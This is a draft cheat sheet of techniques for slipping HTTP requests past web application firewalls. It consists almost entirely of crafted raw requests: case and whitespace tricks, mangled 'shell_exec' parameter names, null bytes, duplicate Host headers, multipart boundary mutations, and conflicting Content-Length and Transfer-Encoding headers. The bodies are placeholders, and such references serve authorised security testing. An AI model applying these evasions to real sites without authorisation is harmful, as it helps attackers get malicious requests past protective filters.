/WAF-bypass-Cheat-Sheet

Another way to bypass WAF Cheat Sheet (draft)

WAF/IPS/DLP bypass Cheat Sheet

Another way to bypass

Add \r\n before the first line HTTP request


GET /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Writing the method with a lowercase (Apache)

get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Tabs before the method (IIS)

    GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

GET /login?shell_exec HTTP/1.1

GET /login?shell.exec HTTP/1.1
GET /login?shell[exec HTTP/1.1
GET /login?shell%5bexec HTTP/1.1
GET /login?shell%2eexec HTTP/1.1
GET /login?shell%5fexec HTTP/1.1
GET /login?shell%20exec HTTP/1.1

GET /login.php?pam_param=test3

GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3

GET /login.php?hello=world HTTP/1.1

GET /login.php?hello%00another_text=world HTTP/1.1

HTTP Request - absoluteURI

GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Double host header

GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Host with lowercase

GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Host without space

GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Host with tab

GET /login.php HTTP/1.1
Host:	favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Host with addition symbols

/ : \x00 \x20 \x09 \xad (IIS)

Example:

GET /login.php HTTP/1.1
Host: favoritewaf.com:12345
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
GET /login.php HTTP/1.1
Host: favoritewaf.com ignored.text
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Type with another text

POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded

hello=world

HTTP request with incorrect Content-Length (more data than specified)

GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Length: 1

AAAAAAAA

Double Content-Type

Content-Type: multipart/form-data; boundary=ZZZ
Content-Type: multipart/form-data; boundary=AAA

Content-Disposition mutation

GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=--------1218108630

----------1218108630
Content-Disposition: form-data; name="hello"

world
----------1218108630--
Content-Disposition: form-data; name="hello"
Content-Disposition: form-data; name="hello
Content-Disposition: form-data; name="hello"world"
Content-Disposition: attachment; name="hello"
Content-Type: multipart/form-data; boundary=x


--x
Content-Disposition:
test1;
--x
test2;
--x--
test3;
name="hello"

world

Boundary mutation PHP

Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;
==
Content-Type: multipart/form-data; boundary=X;

Nullbyte

Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX
==
Content-Type: multipart/form-data; boundary=HELLO

Ignored Content-Length

Content-Type: application/x-www-form-urlencoded
Content-Length: 11

hello=world

==

Content-Length: 22
Transfer-Encoding: chunked

0B
hello=world
0

==

Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked

3
hel
3
lo=
3
wor
2
ld
0